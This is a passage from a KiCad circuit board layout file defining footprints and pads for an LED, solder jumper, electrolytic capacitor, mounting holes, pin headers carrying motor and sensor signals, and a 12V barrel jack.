F.Paste F.Mask) (net 17 "Net-(U5-Pad2)")) (pad 3 smd rect (at 2.45 1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 1 GND)) (model ${KISYS3DMOD}/LED_SMD.3dshapes/LED_WS2812B_PLCC4_5.0x5.0mm_P3.2mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module CustomSymbols:PolarityCenterPositive (layer F.Cu) (tedit 5B69365B) (tstamp 6097A535) (at 103.632 30.48 90) (path /60982AC7) (attr virtual) (fp_text reference Z101 (at 0 -3.175 90) (layer F.SilkS) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value "polarity marker" (at 0 -3.302 90) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_circle (center 2.54 0) (end 3.302 0) (layer F.SilkS) (width 0.2)) (fp_circle (center -2.54 0) (end -3.302 0) (layer F.SilkS) (width 0.2)) (fp_line (start -1.778 0) (end -0.762 0) (layer F.SilkS) (width 0.2)) (fp_line (start 1.778 0) (end 0 0) (layer F.SilkS) (width 0.2)) (fp_line (start -2.921 0) (end -2.159 0) (layer F.SilkS) (width 0.2)) (fp_line (start 2.159 0) (end 2.921 0) (layer F.SilkS) (width 0.2)) (fp_line (start 2.54 -0.381) (end 2.54 0.381) (layer F.SilkS) (width 0.2)) (fp_circle (center 0 0) (end 0 -0.254) (layer F.SilkS) (width 0.2)) (fp_circle (center 0 0) (end 0 -0.127) (layer F.SilkS) (width 0.2)) (fp_arc (start 0 0) (end 0.538815 0.538815) (angle 270) (layer F.SilkS) (width 0.2)) ) (module Jumper:SolderJumper-2_P1.3mm_Bridged_Pad1.0x1.5mm (layer B.Cu) (tedit 5C756AB2) (tstamp 5F7C4975) (at 26.416 42.164 180) (descr "SMD Solder Jumper, 1x1.5mm Pads, 0.3mm gap, bridged with 1 copper strip") (tags "solder jumper open") (path /5F7C7E7A) (attr virtual) (fp_text reference JP2 (at 0 -2.032 180) (layer B.SilkS) hide (effects (font (size 1 1) (thickness 0.15)) (justify mirror)) ) (fp_text value LED_Jumper (at 0 2.032 180) (layer B.Fab) hide (effects (font (size 1 1) (thickness 0.15)) (justify mirror)) ) (fp_poly (pts (xy -0.25 0.3) (xy 0.25 0.3) (xy 0.25 -0.3) (xy -0.25 -0.3)) (layer B.Cu) (width 0)) (fp_line (start 1.65 -1.25) (end -1.65 -1.25) (layer B.CrtYd) (width 0.05)) (fp_line (start 1.65 -1.25) (end 1.65 1.25) (layer B.CrtYd) (width 0.05)) (fp_line (start -1.65 1.25) (end -1.65 -1.25) (layer B.CrtYd) (width 0.05)) (fp_line (start -1.65 1.25) (end 1.65 1.25) (layer B.CrtYd) (width 0.05)) (fp_line (start -1.4 1) (end 1.4 1) (layer B.SilkS) (width 0.12)) (fp_line (start 1.4 1) (end 1.4 -1) (layer B.SilkS) (width 0.12)) (fp_line (start 1.4 -1) (end -1.4 -1) (layer B.SilkS) (width 0.12)) (fp_line (start -1.4 -1) (end -1.4 1) (layer B.SilkS) (width 0.12)) (pad 2 smd rect (at 0.65 0 180) (size 1 1.5) (layers B.Cu B.Mask) (net 43 "Net-(D1-Pad1)")) (pad 1 smd rect (at -0.65 0 180) (size 1 1.5) (layers B.Cu B.Mask) (net 1 GND)) ) (module Capacitors_ThroughHole:CP_Radial_D8.0mm_P3.50mm (layer F.Cu) (tedit 5B92F207) (tstamp 5F7C1F07) (at 40.33 24.892 180) (descr "CP, Radial series, Radial, pin pitch=3.50mm, , diameter=8mm, Electrolytic Capacitor") (tags "CP Radial series Radial pin pitch 3.50mm diameter 8mm Electrolytic Capacitor") (path /56BC627A) (fp_text reference C1 (at 5.532 -3.556) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 100uF (at -3.612 -3.556 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 6.1 -4.35) (end -2.6 -4.35) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.1 4.35) (end 6.1 -4.35) (layer F.CrtYd) (width 0.05)) (fp_line (start -2.6 4.35) (end 6.1 4.35) (layer F.CrtYd) (width 0.05)) (fp_line (start -2.6 -4.35) (end -2.6 4.35) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.6 -0.65) (end -1.6 0.65) (layer F.SilkS) (width 0.12)) (fp_line (start -2.2 0) (end -1 0) (layer F.SilkS) (width 0.12)) (fp_line (start 5.831 -0.246) (end 5.831 0.246) (layer F.SilkS) (width 0.12)) (fp_line (start 5.791 -0.598) (end 5.791 0.598) (layer F.SilkS) (width 0.12)) (fp_line (start 5.751 -0.814) (end 5.751 0.814) (layer F.SilkS) (width 0.12)) (fp_line (start 5.711 -0.983) (end 5.711 0.983) (layer F.SilkS) (width 0.12)) (fp_line (start 5.671 -1.127) (end 5.671 1.127) (layer F.SilkS) (width 0.12)) (fp_line (start 5.631 -1.254) (end 5.631 1.254) (layer F.SilkS) (width 0.12)) (fp_line (start 5.591 -1.369) (end 5.591 1.369) (layer F.SilkS) (width 0.12)) (fp_line (start 5.551 -1.473) (end 5.551 1.473) (layer F.SilkS) (width 0.12)) (fp_line (start 5.511 -1.57) (end 5.511 1.57) (layer F.SilkS) (width 0.12)) (fp_line (start 5.471 -1.66) (end 5.471 1.66) (layer F.SilkS) (width 0.12)) (fp_line (start 5.431 -1.745) (end 5.431 1.745) (layer F.SilkS) (width 0.12)) (fp_line (start 5.391 -1.826) (end 5.391 1.826) (layer F.SilkS) (width 0.12)) (fp_line (start 5.351 -1.902) (end 5.351 1.902) (layer F.SilkS) (width 0.12)) (fp_line (start 5.311 -1.974) (end 5.311 1.974) (layer F.SilkS) (width 0.12)) (fp_line (start 5.271 -2.043) (end 5.271 2.043) (layer F.SilkS) (width 0.12)) (fp_line (start 5.231 -2.109) (end 5.231 2.109) (layer F.SilkS) (width 0.12)) (fp_line (start 5.191 -2.173) (end 5.191 2.173) (layer F.SilkS) (width 0.12)) (fp_line (start 5.151 -2.234) (end 5.151 2.234) (layer F.SilkS) (width 0.12)) (fp_line (start 5.111 -2.293) (end 5.111 2.293) (layer F.SilkS) (width 0.12)) (fp_line (start 5.071 -2.349) (end 5.071 2.349) (layer F.SilkS) (width 0.12)) (fp_line (start 5.031 -2.404) (end 5.031 2.404) (layer F.SilkS) (width 0.12)) (fp_line (start 4.991 -2.457) (end 4.991 2.457) (layer F.SilkS) (width 0.12)) (fp_line (start 4.951 -2.508) (end 4.951 2.508) (layer F.SilkS) (width 0.12)) (fp_line (start 4.911 -2.557) (end 4.911 2.557) (layer F.SilkS) (width 0.12)) (fp_line (start 4.871 -2.605) (end 4.871 2.605) (layer F.SilkS) (width 0.12)) (fp_line (start 4.831 -2.652) (end 4.831 2.652) (layer F.SilkS) (width 0.12)) (fp_line (start 4.791 -2.697) (end 4.791 2.697) (layer F.SilkS) (width 0.12)) (fp_line (start 4.751 -2.74) (end 4.751 2.74) (layer F.SilkS) (width 0.12)) (fp_line (start 4.711 -2.783) (end 4.711 2.783) (layer F.SilkS) (width 0.12)) (fp_line (start 4.671 -2.824) (end 4.671 2.824) (layer F.SilkS) (width 0.12)) (fp_line (start 4.631 -2.865) (end 4.631 2.865) (layer F.SilkS) (width 0.12)) (fp_line (start 4.591 -2.904) (end 4.591 2.904) (layer F.SilkS) (width 0.12)) (fp_line (start 4.551 -2.942) (end 4.551 2.942) (layer F.SilkS) (width 0.12)) (fp_line (start 4.511 -2.979) (end 4.511 2.979) (layer F.SilkS) (width 0.12)) (fp_line (start 4.471 0.98) (end 4.471 3.015) (layer F.SilkS) (width 0.12)) (fp_line (start 4.471 -3.015) (end 4.471 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.431 0.98) (end 4.431 3.05) (layer F.SilkS) (width 0.12)) (fp_line (start 4.431 -3.05) (end 4.431 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.391 0.98) (end 4.391 3.084) (layer F.SilkS) (width 0.12)) (fp_line (start 4.391 -3.084) (end 4.391 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.351 0.98) (end 4.351 3.118) (layer F.SilkS) (width 0.12)) (fp_line (start 4.351 -3.118) (end 4.351 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.311 0.98) (end 4.311 3.15) (layer F.SilkS) (width 0.12)) (fp_line (start 4.311 -3.15) (end 4.311 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.271 0.98) (end 4.271 3.182) (layer F.SilkS) (width 0.12)) (fp_line (start 4.271 -3.182) (end 4.271 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.231 0.98) (end 4.231 3.213) (layer F.SilkS) (width 0.12)) (fp_line (start 4.231 -3.213) (end 4.231 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.191 0.98) (end 4.191 3.243) (layer F.SilkS) (width 0.12)) (fp_line (start 4.191 -3.243) (end 4.191 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.151 0.98) (end 4.151 3.272) (layer F.SilkS) (width 0.12)) (fp_line (start 4.151 -3.272) (end 4.151 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.111 0.98) (end 4.111 3.301) (layer F.SilkS) (width 0.12)) (fp_line (start 4.111 -3.301) (end 4.111 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.071 0.98) (end 4.071 3.329) (layer F.SilkS) (width 0.12)) (fp_line (start 4.071 -3.329) (end 4.071 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.031 0.98) (end 4.031 3.356) (layer F.SilkS) (width 0.12)) (fp_line (start 4.031 -3.356) (end 4.031 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.991 0.98) (end 3.991 3.383) (layer F.SilkS) (width 0.12)) (fp_line (start 3.991 -3.383) (end 3.991 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.951 0.98) (end 3.951 3.408) (layer F.SilkS) (width 0.12)) (fp_line (start 3.951 -3.408) (end 3.951 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.911 0.98) (end 3.911 3.434) (layer F.SilkS) (width 0.12)) (fp_line (start 3.911 -3.434) (end 3.911 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.871 0.98) (end 3.871 3.458) (layer F.SilkS) (width 0.12)) (fp_line (start 3.871 -3.458) (end 3.871 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.831 0.98) (end 3.831 3.482) (layer F.SilkS) (width 0.12)) (fp_line (start 3.831 -3.482) (end 3.831 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.791 0.98) (end 3.791 3.505) (layer F.SilkS) (width 0.12)) (fp_line (start 3.791 -3.505) (end 3.791 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.751 0.98) (end 3.751 3.528) (layer F.SilkS) (width 0.12)) (fp_line (start 3.751 -3.528) (end 3.751 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.711 0.98) (end 3.711 3.55) (layer F.SilkS) (width 0.12)) (fp_line (start 3.711 -3.55) (end 3.711 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.671 0.98) (end 3.671 3.572) (layer F.SilkS) (width 0.12)) (fp_line (start 3.671 -3.572) (end 3.671 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.631 0.98) (end 3.631 3.593) (layer F.SilkS) (width 0.12)) (fp_line (start 3.631 -3.593) (end 3.631 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.591 0.98) (end 3.591 3.613) (layer F.SilkS) (width 0.12)) (fp_line (start 3.591 -3.613) (end 3.591 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.551 0.98) (end 3.551 3.633) (layer F.SilkS) (width 0.12)) (fp_line (start 3.551 -3.633) (end 3.551 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.511 0.98) (end 3.511 3.652) (layer F.SilkS) (width 0.12)) (fp_line (start 3.511 -3.652) (end 3.511 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.471 0.98) (end 3.471 3.671) (layer F.SilkS) (width 0.12)) (fp_line (start 3.471 -3.671) (end 3.471 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.431 0.98) (end 3.431 3.69) (layer F.SilkS) (width 0.12)) (fp_line (start 3.431 -3.69) (end 3.431 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.391 0.98) (end 3.391 3.707) (layer F.SilkS) (width 0.12)) (fp_line (start 3.391 -3.707) (end 3.391 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.351 0.98) (end 3.351 3.725) (layer F.SilkS) (width 0.12)) (fp_line (start 3.351 -3.725) (end 3.351 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.311 0.98) (end 3.311 3.741) (layer F.SilkS) (width 0.12)) (fp_line (start 3.311 -3.741) (end 3.311 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.271 0.98) (end 3.271 3.758) (layer F.SilkS) (width 0.12)) (fp_line (start 3.271 -3.758) (end 3.271 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.231 0.98) (end 3.231 3.773) (layer F.SilkS) (width 0.12)) (fp_line (start 3.231 -3.773) (end 3.231 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.191 0.98) (end 3.191 3.789) (layer F.SilkS) (width 0.12)) (fp_line (start 3.191 -3.789) (end 3.191 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.151 0.98) (end 3.151 3.803) (layer F.SilkS) (width 0.12)) (fp_line (start 3.151 -3.803) (end 3.151 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.111 0.98) (end 3.111 3.818) (layer F.SilkS) (width 0.12)) (fp_line (start 3.111 -3.818) (end 3.111 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.071 0.98) (end 3.071 3.832) (layer F.SilkS) (width 0.12)) (fp_line (start 3.071 -3.832) (end 3.071 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.031 0.98) (end 3.031 3.845) (layer F.SilkS) (width 0.12)) (fp_line (start 3.031 -3.845) (end 3.031 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.991 0.98) (end 2.991 3.858) (layer F.SilkS) (width 0.12)) (fp_line (start 2.991 -3.858) (end 2.991 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.951 0.98) (end 2.951 3.87) (layer F.SilkS) (width 0.12)) (fp_line (start 2.951 -3.87) (end 2.951 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.911 0.98) (end 2.911 3.883) (layer F.SilkS) (width 0.12)) (fp_line (start 2.911 -3.883) (end 2.911 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.871 0.98) (end 2.871 3.894) (layer F.SilkS) (width 0.12)) (fp_line (start 2.871 -3.894) (end 2.871 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.831 0.98) (end 2.831 3.905) (layer F.SilkS) (width 0.12)) (fp_line (start 2.831 -3.905) (end 2.831 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.791 0.98) (end 2.791 3.916) (layer F.SilkS) (width 0.12)) (fp_line (start 2.791 -3.916) (end 2.791 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.751 0.98) (end 2.751 3.926) (layer F.SilkS) (width 0.12)) (fp_line (start 2.751 -3.926) (end 2.751 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.711 0.98) (end 2.711 3.936) (layer F.SilkS) (width 0.12)) (fp_line (start 2.711 -3.936) (end 2.711 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.671 0.98) (end 2.671 3.946) (layer F.SilkS) (width 0.12)) (fp_line (start 2.671 -3.946) (end 2.671 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.631 0.98) (end 2.631 3.955) (layer F.SilkS) (width 0.12)) (fp_line (start 2.631 -3.955) (end 2.631 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.591 0.98) (end 2.591 3.963) (layer F.SilkS) (width 0.12)) (fp_line (start 2.591 -3.963) (end 2.591 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.551 0.98) (end 2.551 3.971) (layer F.SilkS) (width 0.12)) (fp_line (start 2.551 -3.971) (end 2.551 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.511 -3.979) (end 2.511 3.979) (layer F.SilkS) (width 0.12)) (fp_line (start 2.471 -3.987) (end 2.471 3.987) (layer F.SilkS) (width 0.12)) (fp_line (start 2.43 -3.994) (end 2.43 3.994) (layer F.SilkS) (width 0.12)) (fp_line (start 2.39 -4) (end 2.39 4) (layer F.SilkS) (width 0.12)) (fp_line (start 2.35 -4.006) (end 2.35 4.006) (layer F.SilkS) (width 0.12)) (fp_line (start 2.31 -4.012) (end 2.31 4.012) (layer F.SilkS) (width 0.12)) (fp_line (start 2.27 -4.017) (end 2.27 4.017) (layer F.SilkS) (width 0.12)) (fp_line (start 2.23 -4.022) (end 2.23 4.022) (layer F.SilkS) (width 0.12)) (fp_line (start 2.19 -4.027) (end 2.19 4.027) (layer F.SilkS) (width 0.12)) (fp_line (start 2.15 -4.031) (end 2.15 4.031) (layer F.SilkS) (width 0.12)) (fp_line (start 2.11 -4.035) (end 2.11 4.035) (layer F.SilkS) (width 0.12)) (fp_line (start 2.07 -4.038) (end 2.07 4.038) (layer F.SilkS) (width 0.12)) (fp_line (start 2.03 -4.041) (end 2.03 4.041) (layer F.SilkS) (width 0.12)) (fp_line (start 1.99 -4.043) (end 1.99 4.043) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 -4.046) (end 1.95 4.046) (layer F.SilkS) (width 0.12)) (fp_line (start 1.91 -4.047) (end 1.91 4.047) (layer F.SilkS) (width 0.12)) (fp_line (start 1.87 -4.049) (end 1.87 4.049) (layer F.SilkS) (width 0.12)) (fp_line (start 1.83 -4.05) (end 1.83 4.05) (layer F.SilkS) (width 0.12)) (fp_line (start 1.79 -4.05) (end 1.79 4.05) (layer F.SilkS) (width 0.12)) (fp_line (start 1.75 -4.05) (end 1.75 4.05) (layer F.SilkS) (width 0.12)) (fp_line (start -1.6 -0.65) (end -1.6 0.65) (layer F.Fab) (width 0.1)) (fp_line (start -2.2 0) (end -1 0) (layer F.Fab) (width 0.1)) (fp_circle (center 1.75 0) (end 5.84 0) (layer F.SilkS) (width 0.12)) (fp_circle (center 1.75 0) (end 5.75 0) (layer F.Fab) (width 0.1)) (fp_text user %R (at 5.532 -3.556 180) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (pad 1 thru_hole rect (at 0 0 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 45 +12V)) (pad 2 thru_hole circle (at 3.5 0 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (model ${KISYS3DMOD}/Capacitors_THT.3dshapes/CP_Radial_D8.0mm_P3.50mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module MountingHoles:M4_mount (layer F.Cu) (tedit 5B70A708) (tstamp 5B70AD70) (at 28.128 24.064) (path /5B99526A) (attr virtual) (fp_text reference Z1 (at 0 1.7) (layer F.SilkS) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value MOUNT (at 0 -1.5) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_circle (center 0 0) (end 4 0) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole circle (at 0 0) (size 5.5 5.5) (drill 4.5) (layers *.Cu *.Mask) (net 1 GND) (clearance 1.5)) ) (module MountingHoles:M4_mount (layer F.Cu) (tedit 5B99595A) (tstamp 5B70AD68) (at 28.128 63.942) (path /5B998432) (attr virtual) (fp_text reference Z2 (at 0 1.7) (layer F.SilkS) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value MOUNT (at 0 -1.5) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_circle (center 0 0) (end 4 0) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole circle (at 0 0) (size 5.5 5.5) (drill 4.5) (layers *.Cu *.Mask) (net 1 GND) (clearance 1.5)) ) (module PinHeaders:Pin_Header_Straight_2x07_Pitch2.54mm_IDC_Shrouded (layer F.Cu) (tedit 5B731A5E) (tstamp 59E2FBC4) (at 109.474 38.1) (descr "Through hole straight pin header, 2x07, 2.54mm pitch, double rows") (tags "Through hole pin header THT 2x07 2.54mm double row") (path /59D7346F) (fp_text reference J2 (at 1.27 -2.33) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value "EXP. OUT" (at 1.27 21.082) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 4.35 -1.8) (end -1.8 -1.8) (layer F.CrtYd) (width 0.05)) (fp_line (start 4.35 17.05) (end 4.35 -1.8) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.8 17.05) (end 4.35 17.05) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.8 -1.8) (end -1.8 17.05) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.33 -1.33) (end 0 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 0) (end -1.33 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start 1.27 -1.33) (end 3.87 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start 1.27 1.27) (end 1.27 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 1.27) (end 1.27 1.27) (layer F.SilkS) (width 0.12)) (fp_line (start 3.87 -1.33) (end 3.87 16.57) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 1.27) (end -1.33 16.57) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 16.57) (end 3.87 16.57) (layer F.SilkS) (width 0.12)) (fp_line (start -1.27 0) (end 0 -1.27) (layer F.Fab) (width 0.1)) (fp_line (start -1.27 16.51) (end -1.27 0) (layer F.Fab) (width 0.1)) (fp_line (start 3.81 16.51) (end -1.27 16.51) (layer F.Fab) (width 0.1)) (fp_line (start 3.81 -1.27) (end 3.81 16.51) (layer F.Fab) (width 0.1)) (fp_line (start 0 -1.27) (end 3.81 -1.27) (layer F.Fab) (width 0.1)) (fp_line (start 5.82 -5.08) (end 5.82 20.32) (layer F.SilkS) (width 0.15)) (fp_line (start -3.28 -5.08) (end 5.82 -5.08) (layer F.SilkS) (width 0.15)) (fp_line (start -3.28 20.32) (end -3.28 -5.08) (layer F.SilkS) (width 0.15)) (fp_line (start 5.82 20.32) (end -3.28 20.32) (layer F.SilkS) (width 0.15)) (fp_line (start -2.3 9.87) (end -3.28 9.87) (layer F.SilkS) (width 0.15)) (fp_line (start -2.3 5.37) (end -2.3 9.87) (layer F.SilkS) (width 0.15)) (fp_line (start -3.28 5.37) (end -2.3 5.37) (layer F.SilkS) (width 0.15)) (fp_text user %R (at 1.27 7.62 90) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (pad 1 thru_hole rect (at 0 0) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 45 +12V)) (pad 2 thru_hole oval (at 2.54 0) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 45 +12V)) (pad 3 thru_hole oval (at 0 2.54) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 1 GND)) (pad 4 thru_hole oval (at 2.54 2.54) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 1 GND)) (pad 5 thru_hole oval (at 0 5.08) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 15 +5V)) (pad 6 thru_hole oval (at 2.54 5.08) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 15 +5V)) (pad 7 thru_hole oval (at 0 7.62) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 26 /MOTOR_DATA_OUT)) (pad 8 thru_hole oval (at 2.54 7.62) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 21 /MOTOR_LATCH)) (pad 9 thru_hole oval (at 0 10.16) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 27 /SENSOR_DATA_IN)) (pad 10 thru_hole oval (at 2.54 10.16) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 23 /SENSOR_LATCH)) (pad 11 thru_hole oval (at 0 12.7) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 24 /SPI_CLOCK)) (pad 12 thru_hole oval (at 2.54 12.7) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 28 /DBGLED_OUT)) (pad 13 thru_hole oval (at 0 15.24) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 14 thru_hole oval (at 2.54 15.24) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (model ${KISYS3DMOD}/Pin_Headers.3dshapes/Pin_Header_Straight_2x07_Pitch2.54mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module PinHeaders:Pin_Header_Straight_1x04 (layer F.Cu) (tedit 5664E314) (tstamp 566360E0) (at 81.788 66.294 90) (descr "Through hole pin header") (tags "pin header") (path /566350EF) (fp_text reference P8 (at 0 -3.302 180) (layer F.SilkS) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value CONN_01X04 (at 0 -3.1 90) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -1.2 -1.2) (end 1.2 -1.2) (layer F.SilkS) (width 0.15)) (fp_line (start 1.2 -1.2) (end 1.2 8.82) (layer F.SilkS) (width 0.15)) (fp_line (start -1.2 -1.2) (end -1.2 8.82) (layer F.SilkS) (width 0.15)) (fp_line (start -1.2 8.82) (end 1.2 8.82) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole rect (at 0 0 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 1 GND)) (pad 2 thru_hole oval (at 0 2.54 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 1 GND)) (pad 3 thru_hole oval (at 0 5.08 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 1 GND)) (pad 4 thru_hole oval (at 0 7.62 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 1 GND)) (model Pin_Headers.3dshapes/Pin_Header_Straight_1x04.wrl (offset (xyz 0 -3.809999942779541 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 90)) ) ) (module PinHeaders:Pin_Header_Straight_1x04 (layer F.Cu) (tedit 5664E311) (tstamp 566360D8) (at 81.788 63.754 90) (descr "Through hole pin header") (tags "pin header") (path /5663509E) (fp_text reference P7 (at 0 -3.048 180) (layer F.SilkS) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value CONN_01X04 (at 0 -3.1 90) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -1.2 -1.2) (end 1.2 -1.2) (layer F.SilkS) (width 0.15)) (fp_line (start 1.2 -1.2) (end 1.2 8.82) (layer F.SilkS) (width 0.15)) (fp_line (start -1.2 -1.2) (end -1.2 8.82) (layer F.SilkS) (width 0.15)) (fp_line (start -1.2 8.82) (end 1.2 8.82) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole rect (at 0 0 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 15 +5V)) (pad 2 thru_hole oval (at 0 2.54 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 15 +5V)) (pad 3 thru_hole oval (at 0 5.08 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 15 +5V)) (pad 4 thru_hole oval (at 0 7.62 90) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 15 +5V)) (model Pin_Headers.3dshapes/Pin_Header_Straight_1x04.wrl (offset (xyz 0 -3.809999942779541 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 90)) ) ) (module PJ-202A:PJ-202A (layer F.Cu) (tedit 56E4A9C6) (tstamp 565D676E) (at 109.728 26.67) (descr "CONN POWER JACK 2.1MM PCB") (tags "CONN POWER JACK 2.1MM PCB BARREL JACK") (path /565BF7C7) (fp_text reference CON1 (at 0 -2.54) (layer F.SilkS) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value MOTOR_PWR (at 0.7 3.5) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -3.7 4.5) (end -3.7 2.3) (layer F.Fab) (width 0.15)) (fp_line (start 10.7 4.5) (end -3.7 4.5) (layer F.Fab) (width 0.15)) (fp_line (start 10.7 -4.5) (end 10.7 4.5) (layer F.Fab) (width 0.15)) (fp_line (start 2 -4.5) (end 10.7 -4.5) (layer F.Fab) (width 0.15)) (fp_line (start -3.7 -4.5) (end -2 -4.5) (layer F.Fab) (width 0.15)) (fp_line (start -3.7 -2.3) (end -3.7 -4.5) (layer F.Fab) (width 0.15)) (fp_line (start 7.2 -4.5) (end 7.2 4.5) (layer F.Fab) (width 0.15)) (pad 1 thru_hole oval (at -3 0) (size 2 4.5) (drill oval 1 3.5) (layers *.Cu *.Mask F.SilkS) (net 45 +12V)) (pad 2 thru_hole oval (at 3 0) (size 2 4) (drill oval 1 3) (layers *.Cu *.Mask F.SilkS) (net 1 GND)) (pad 3 thru_hole oval (at 0 -4.7) (size 4 2) (drill oval 3 1) (layers 